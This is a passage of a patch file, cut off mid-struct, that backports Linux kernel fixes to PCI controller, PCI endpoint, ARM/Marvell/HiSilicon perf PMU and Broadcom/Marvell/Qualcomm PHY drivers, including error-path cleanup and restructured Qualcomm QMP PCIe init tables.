+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index c6725c519a479..9e4d96e5a3f5a 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -641,7 +641,7 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 	if (pci->n_fts[1]) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL);
+ 		val &= ~PORT_LOGIC_N_FTS_MASK;
+-		val |= pci->n_fts[pci->link_gen - 1];
++		val |= pci->n_fts[1];
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index e06e9f4fc50f7..769eedeb8802a 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -719,6 +719,7 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 	resource_size_t offset[2] = {0};
+ 	resource_size_t membar2_offset = 0x2000;
+ 	struct pci_bus *child;
++	struct pci_dev *dev;
+ 	int ret;
+ 
+ 	/*
+@@ -859,8 +860,25 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 
+ 	pci_scan_child_bus(vmd->bus);
+ 	vmd_domain_reset(vmd);
+-	list_for_each_entry(child, &vmd->bus->children, node)
+-		pci_reset_bus(child->self);
++
++	/* When Intel VMD is enabled, the OS does not discover the Root Ports
++	 * owned by Intel VMD within the MMCFG space. pci_reset_bus() applies
++	 * a reset to the parent of the PCI device supplied as argument. This
++	 * is why we pass a child device, so the reset can be triggered at
++	 * the Intel bridge level and propagated to all the children in the
++	 * hierarchy.
++	 */
++	list_for_each_entry(child, &vmd->bus->children, node) {
++		if (!list_empty(&child->devices)) {
++			dev = list_first_entry(&child->devices,
++					       struct pci_dev, bus_list);
++			if (pci_reset_bus(dev))
++				pci_warn(dev, "can't reset device: %d\n", ret);
++
++			break;
++		}
++	}
++
+ 	pci_assign_unassigned_bus_resources(vmd->bus);
+ 
+ 	/*
+@@ -980,6 +998,11 @@ static int vmd_resume(struct device *dev)
+ 	struct vmd_dev *vmd = pci_get_drvdata(pdev);
+ 	int err, i;
+ 
++       if (vmd->irq_domain)
++               vmd_set_msi_remapping(vmd, true);
++       else
++               vmd_set_msi_remapping(vmd, false);
++
+ 	for (i = 0; i < vmd->msix_count; i++) {
+ 		err = devm_request_irq(dev, vmd->irqs[i].virq,
+ 				       vmd_irq, IRQF_NO_THREAD,
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index 36b1801a061b7..55283d2379a6a 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -979,7 +979,7 @@ static int pci_epf_test_bind(struct pci_epf *epf)
+ 	if (ret)
+ 		epf_test->dma_supported = false;
+ 
+-	if (linkup_notifier) {
++	if (linkup_notifier || core_init_notifier) {
+ 		epf->nb.notifier_call = pci_epf_test_notifier;
+ 		pci_epc_register_notifier(epc, &epf->nb);
+ 	} else {
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 0ea85e1d292ec..fba0179939b8f 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -557,7 +557,7 @@ static int epf_ntb_db_bar_init(struct epf_ntb *ntb)
+ 	return ret;
+ 
+ err_alloc_peer_mem:
+-	pci_epc_mem_free_addr(ntb->epf->epc, epf_bar->phys_addr, mw_addr, epf_bar->size);
++	pci_epf_free_space(ntb->epf, mw_addr, barno, 0);
+ 	return -1;
+ }
+ 
+diff --git a/drivers/pci/irq.c b/drivers/pci/irq.c
+index 12ecd0aaa28d6..0050e8f6814ed 100644
+--- a/drivers/pci/irq.c
++++ b/drivers/pci/irq.c
+@@ -44,6 +44,8 @@ int pci_request_irq(struct pci_dev *dev, unsigned int nr, irq_handler_t handler,
+ 	va_start(ap, fmt);
+ 	devname = kvasprintf(GFP_KERNEL, fmt, ap);
+ 	va_end(ap);
++	if (!devname)
++		return -ENOMEM;
+ 
+ 	ret = request_threaded_irq(pci_irq_vector(dev, nr), handler, thread_fn,
+ 				   irqflags, devname, dev_id);
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index b66fa42c4b1fa..1d6f7b502020d 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -1891,9 +1891,6 @@ int pci_setup_device(struct pci_dev *dev)
+ 
+ 	dev->broken_intx_masking = pci_intx_mask_broken(dev);
+ 
+-	/* Clear errors left from system firmware */
+-	pci_write_config_word(dev, PCI_STATUS, 0xffff);
+-
+ 	switch (dev->hdr_type) {		    /* header type */
+ 	case PCI_HEADER_TYPE_NORMAL:		    /* standard header */
+ 		if (class == PCI_CLASS_BRIDGE_PCI)
+diff --git a/drivers/perf/arm_dmc620_pmu.c b/drivers/perf/arm_dmc620_pmu.c
+index 280a6ae3e27cf..54aa4658fb36e 100644
+--- a/drivers/perf/arm_dmc620_pmu.c
++++ b/drivers/perf/arm_dmc620_pmu.c
+@@ -725,6 +725,8 @@ static struct platform_driver dmc620_pmu_driver = {
+ 
+ static int __init dmc620_pmu_init(void)
+ {
++	int ret;
++
+ 	cpuhp_state_num = cpuhp_setup_state_multi(CPUHP_AP_ONLINE_DYN,
+ 				      DMC620_DRVNAME,
+ 				      NULL,
+@@ -732,7 +734,11 @@ static int __init dmc620_pmu_init(void)
+ 	if (cpuhp_state_num < 0)
+ 		return cpuhp_state_num;
+ 
+-	return platform_driver_register(&dmc620_pmu_driver);
++	ret = platform_driver_register(&dmc620_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(cpuhp_state_num);
++
++	return ret;
+ }
+ 
+ static void __exit dmc620_pmu_exit(void)
+diff --git a/drivers/perf/arm_dsu_pmu.c b/drivers/perf/arm_dsu_pmu.c
+index 4a15c86f45efb..fe2abb412c004 100644
+--- a/drivers/perf/arm_dsu_pmu.c
++++ b/drivers/perf/arm_dsu_pmu.c
+@@ -858,7 +858,11 @@ static int __init dsu_pmu_init(void)
+ 	if (ret < 0)
+ 		return ret;
+ 	dsu_pmu_cpuhp_state = ret;
+-	return platform_driver_register(&dsu_pmu_driver);
++	ret = platform_driver_register(&dsu_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(dsu_pmu_cpuhp_state);
++
++	return ret;
+ }
+ 
+ static void __exit dsu_pmu_exit(void)
+diff --git a/drivers/perf/arm_smmuv3_pmu.c b/drivers/perf/arm_smmuv3_pmu.c
+index 00d4c45a8017d..25a269d431e45 100644
+--- a/drivers/perf/arm_smmuv3_pmu.c
++++ b/drivers/perf/arm_smmuv3_pmu.c
+@@ -959,6 +959,8 @@ static struct platform_driver smmu_pmu_driver = {
+ 
+ static int __init arm_smmu_pmu_init(void)
+ {
++	int ret;
++
+ 	cpuhp_state_num = cpuhp_setup_state_multi(CPUHP_AP_ONLINE_DYN,
+ 						  "perf/arm/pmcg:online",
+ 						  NULL,
+@@ -966,7 +968,11 @@ static int __init arm_smmu_pmu_init(void)
+ 	if (cpuhp_state_num < 0)
+ 		return cpuhp_state_num;
+ 
+-	return platform_driver_register(&smmu_pmu_driver);
++	ret = platform_driver_register(&smmu_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(cpuhp_state_num);
++
++	return ret;
+ }
+ module_init(arm_smmu_pmu_init);
+ 
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index 21771708597db..071e63d9a9ac6 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -693,10 +693,10 @@ static struct attribute *hisi_pcie_pmu_events_attr[] = {
+ 	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_cnt, 0x10210),
+ 	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_latency, 0x0011),
+ 	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_cnt, 0x10011),
+-	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_flux, 0x1005),
+-	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_time, 0x11005),
+-	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_flux, 0x2004),
+-	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_time, 0x12004),
++	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_flux, 0x0804),
++	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_time, 0x10804),
++	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_flux, 0x0405),
++	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_time, 0x10405),
+ 	NULL
+ };
+ 
+diff --git a/drivers/perf/marvell_cn10k_tad_pmu.c b/drivers/perf/marvell_cn10k_tad_pmu.c
+index 69c3050a4348b..a1166afb37024 100644
+--- a/drivers/perf/marvell_cn10k_tad_pmu.c
++++ b/drivers/perf/marvell_cn10k_tad_pmu.c
+@@ -408,7 +408,11 @@ static int __init tad_pmu_init(void)
+ 	if (ret < 0)
+ 		return ret;
+ 	tad_pmu_cpuhp_state = ret;
+-	return platform_driver_register(&tad_pmu_driver);
++	ret = platform_driver_register(&tad_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(tad_pmu_cpuhp_state);
++
++	return ret;
+ }
+ 
+ static void __exit tad_pmu_exit(void)
+diff --git a/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c b/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
+index d2524b70ea161..3b374b37b965b 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
++++ b/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
+@@ -331,13 +331,12 @@ static void usb_uninit_common_7216(struct brcm_usb_init_params *params)
+ 
+ 	pr_debug("%s\n", __func__);
+ 
+-	if (!params->wake_enabled) {
+-		USB_CTRL_SET(ctrl, USB_PM, USB_PWRDN);
+-
++	if (params->wake_enabled) {
+ 		/* Switch to using slower clock during suspend to save power */
+ 		USB_CTRL_SET(ctrl, USB_PM, XHC_S2_CLK_SWITCH_EN);
+-	} else {
+ 		usb_wake_enable_7216(params, true);
++	} else {
++		USB_CTRL_SET(ctrl, USB_PM, USB_PWRDN);
+ 	}
+ }
+ 
+@@ -425,7 +424,6 @@ void brcm_usb_dvr_init_7216(struct brcm_usb_init_params *params)
+ 
+ 	params->family_name = "7216";
+ 	params->ops = &bcm7216_ops;
+-	params->suspend_with_clocks = true;
+ }
+ 
+ void brcm_usb_dvr_init_7211b0(struct brcm_usb_init_params *params)
+@@ -435,5 +433,4 @@ void brcm_usb_dvr_init_7211b0(struct brcm_usb_init_params *params)
+ 
+ 	params->family_name = "7211";
+ 	params->ops = &bcm7211b0_ops;
+-	params->suspend_with_clocks = true;
+ }
+diff --git a/drivers/phy/broadcom/phy-brcm-usb-init.h b/drivers/phy/broadcom/phy-brcm-usb-init.h
+index 1ccb5ddab865c..3236e94988428 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb-init.h
++++ b/drivers/phy/broadcom/phy-brcm-usb-init.h
+@@ -61,7 +61,6 @@ struct  brcm_usb_init_params {
+ 	const struct brcm_usb_init_ops *ops;
+ 	struct regmap *syscon_piarbctl;
+ 	bool wake_enabled;
+-	bool suspend_with_clocks;
+ };
+ 
+ void brcm_usb_dvr_init_4908(struct brcm_usb_init_params *params);
+diff --git a/drivers/phy/broadcom/phy-brcm-usb.c b/drivers/phy/broadcom/phy-brcm-usb.c
+index 2cb3779fcdf82..2bfd78e2d8fd6 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb.c
++++ b/drivers/phy/broadcom/phy-brcm-usb.c
+@@ -102,9 +102,9 @@ static int brcm_pm_notifier(struct notifier_block *notifier,
+ 
+ static irqreturn_t brcm_usb_phy_wake_isr(int irq, void *dev_id)
+ {
+-	struct phy *gphy = dev_id;
++	struct device *dev = dev_id;
+ 
+-	pm_wakeup_event(&gphy->dev, 0);
++	pm_wakeup_event(dev, 0);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -451,7 +451,7 @@ static int brcm_usb_phy_dvr_init(struct platform_device *pdev,
+ 	if (priv->wake_irq >= 0) {
+ 		err = devm_request_irq(dev, priv->wake_irq,
+ 				       brcm_usb_phy_wake_isr, 0,
+-				       dev_name(dev), gphy);
++				       dev_name(dev), dev);
+ 		if (err < 0)
+ 			return err;
+ 		device_set_wakeup_capable(dev, 1);
+@@ -598,7 +598,7 @@ static int brcm_usb_phy_suspend(struct device *dev)
+ 		 * and newer XHCI->2.0-clks/3.0-clks.
+ 		 */
+ 
+-		if (!priv->ini.suspend_with_clocks) {
++		if (!priv->ini.wake_enabled) {
+ 			if (priv->phys[BRCM_USB_PHY_3_0].inited)
+ 				clk_disable_unprepare(priv->usb_30_clk);
+ 			if (priv->phys[BRCM_USB_PHY_2_0].inited ||
+@@ -615,8 +615,10 @@ static int brcm_usb_phy_resume(struct device *dev)
+ {
+ 	struct brcm_usb_phy_data *priv = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(priv->usb_20_clk);
+-	clk_prepare_enable(priv->usb_30_clk);
++	if (!priv->ini.wake_enabled) {
++		clk_prepare_enable(priv->usb_20_clk);
++		clk_prepare_enable(priv->usb_30_clk);
++	}
+ 	brcm_usb_init_ipp(&priv->ini);
+ 
+ 	/*
+diff --git a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+index 67712c77d806f..d641b345afa35 100644
+--- a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
++++ b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+@@ -826,6 +826,9 @@ mvebu_a3700_comphy_usb3_power_on(struct mvebu_a3700_comphy_lane *lane)
+ 	if (ret)
+ 		return ret;
+ 
++	/* COMPHY register reset (cleared automatically) */
++	comphy_lane_reg_set(lane, COMPHY_SFT_RESET, SFT_RST, SFT_RST);
++
+ 	/*
+ 	 * 0. Set PHY OTG Control(0x5d034), bit 4, Power up OTG module The
+ 	 * register belong to UTMI module, so it is set in UTMI phy driver.
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index 5be5348fbb26b..bb40172e23d49 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -14,6 +14,7 @@
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_address.h>
++#include <linux/phy/pcie.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+ #include <linux/regulator/consumer.h>
+@@ -505,6 +506,13 @@ static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_FLL_CNTRL1, 0x01),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_P2U3_WAKEUP_DLY_TIME_AUXCLK_H, 0x0),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_P2U3_WAKEUP_DLY_TIME_AUXCLK_L, 0x1),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_G12S1_TXDEEMPH_M3P5DB, 0x10),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_DCC_CAL_CONFIG, 0x01),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_SIGDET_LVL, 0xaa),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_REFGEN_REQ_CONFIG1, 0x0d),
++};
++
++static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_misc_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_ACTIONS, 0x0),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_L1P1_WAKEUP_DLY_TIME_AUXCLK_H, 0x00),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_L1P1_WAKEUP_DLY_TIME_AUXCLK_L, 0x01),
+@@ -517,11 +525,7 @@ static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG2, 0x50),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG4, 0x1a),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5, 0x6),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_G12S1_TXDEEMPH_M3P5DB, 0x10),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_DCC_CAL_CONFIG, 0x01),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_SIGDET_LVL, 0xaa),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_REFGEN_REQ_CONFIG1, 0x0d),
+ };
+ 
+ static const struct qmp_phy_init_tbl sdm845_qmp_pcie_serdes_tbl[] = {
+@@ -1184,15 +1188,29 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen3x1_pcie_pcs_misc_tbl[] = {
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BIAS_EN_CLKBUFLR_EN, 0x14),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_IVCO, 0x0f),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_EN, 0x46),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_CFG, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_TUNE_MAP, 0x02),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_SEL, 0x12),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_HS_SWITCH_SEL, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE0, 0x0a),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE1, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MISC1, 0x88),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_CONFIG, 0x06),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MODE, 0x14),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_DC_LEVEL_CTRL, 0x0f),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rc_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_PER1, 0x31),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_PER2, 0x01),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE1_MODE0, 0xde),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE2_MODE0, 0x07),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE1_MODE1, 0x97),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE2_MODE1, 0x0c),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BIAS_EN_CLKBUFLR_EN, 0x14),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CLK_ENABLE1, 0x90),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_IVCO, 0x0f),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE0, 0x06),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE1, 0x06),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE0, 0x16),
+@@ -1200,8 +1218,6 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE0, 0x36),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE1, 0x36),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYSCLK_EN_SEL, 0x08),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_EN, 0x46),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_CFG, 0x04),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE0, 0x0a),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE0, 0x1a),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE1, 0x14),
+@@ -1214,17 +1230,8 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START1_MODE1, 0x55),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START2_MODE1, 0x55),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START3_MODE1, 0x05),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_TUNE_MAP, 0x02),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CLK_SELECT, 0x34),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_SEL, 0x12),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_HS_SWITCH_SEL, 0x00),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE0, 0x0a),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE1, 0x04),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MISC1, 0x88),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORE_CLK_EN, 0x20),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_CONFIG, 0x06),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MODE, 0x14),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_DC_LEVEL_CTRL, 0x0f),
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_tx_tbl[] = {
+@@ -1285,46 +1292,80 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rx_tbl[] = {
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_pcs_tbl[] = {
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_EQ_CONFIG2, 0x16),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_EQ_CONFIG3, 0x22),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_G3S2_PRE_GAIN, 0x2e),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_RX_SIGDET_LVL, 0x99),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_EQ_CONFIG4, 0x16),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_EQ_CONFIG5, 0x22),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_G3S2_PRE_GAIN, 0x2e),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_RX_SIGDET_LVL, 0x99),
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_pcs_misc_tbl[] = {
+-	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
+-	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS, 0x00),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_G4_EQ_CONFIG5, 0x02),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_EQ_CONFIG1, 0x16),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_RX_MARGINING_CONFIG3, 0x28),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_G4_PRE_GAIN, 0x2e),
+ };
+ 
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl[] = {
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS, 0x00),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_PRESET_P10_POST, 0x00),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_ep_serdes_tbl[] = {
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BG_TIMER, 0x02),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYS_CLK_CTRL, 0x07),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE0, 0x27),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE1, 0x0a),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE0, 0x17),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE1, 0x19),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE0, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE1, 0x03),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYSCLK_EN_SEL, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE0, 0xff),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE0, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE1, 0xff),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE1, 0x09),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DEC_START_MODE0, 0x19),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DEC_START_MODE1, 0x28),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN0_MODE0, 0xfb),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN1_MODE0, 0x01),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN0_MODE1, 0xfb),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN1_MODE1, 0x01),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORE_CLK_EN, 0x60),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl[] = {
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5, 0x08),
++};
++
++struct qmp_phy_cfg_tables {
++	const struct qmp_phy_init_tbl *serdes;
++	int serdes_num;
++	const struct qmp_phy_init_tbl *tx;
++	int tx_num;
++	const struct qmp_phy_init_tbl *rx;
++	int rx_num;
++	const struct qmp_phy_init_tbl *pcs;
++	int pcs_num;
++	const struct qmp_phy_init_tbl *pcs_misc;
++	int pcs_misc_num;
++};
++
+ /* struct qmp_phy_cfg - per-PHY initialization config */
+ struct qmp_phy_cfg {
+ 	int lanes;
+ 
+-	/* Init sequence for PHY blocks - serdes, tx, rx, pcs */
+-	const struct qmp_phy_init_tbl *serdes_tbl;
+-	int serdes_tbl_num;
+-	const struct qmp_phy_init_tbl *serdes_tbl_sec;
+-	int serdes_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *tx_tbl;
+-	int tx_tbl_num;
+-	const struct qmp_phy_init_tbl *tx_tbl_sec;
+-	int tx_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *rx_tbl;
+-	int rx_tbl_num;
+-	const struct qmp_phy_init_tbl *rx_tbl_sec;
+-	int rx_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *pcs_tbl;
+-	int pcs_tbl_num;
+-	const struct qmp_phy_init_tbl *pcs_tbl_sec;
+-	int pcs_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *pcs_misc_tbl;
+-	int pcs_misc_tbl_num;
+-	const struct qmp_phy_init_tbl *pcs_misc_tbl_sec;
+-	int pcs_misc_tbl_num_sec;
++	/* Main init sequence for PHY blocks - serdes, tx, rx, pcs */
++	const struct qmp_phy_cfg_tables tables;
++	/*
++	 * Additional init sequences for PHY blocks, providing additional
++	 * register programming. They are used for providing separate sequences
++	 * for the Root Complex and End Point use cases.
++	 *
++	 * If EP mode is not supported, both tables can be left unset.
++	 */
++	const struct qmp_phy_cfg_tables *tables_rc;
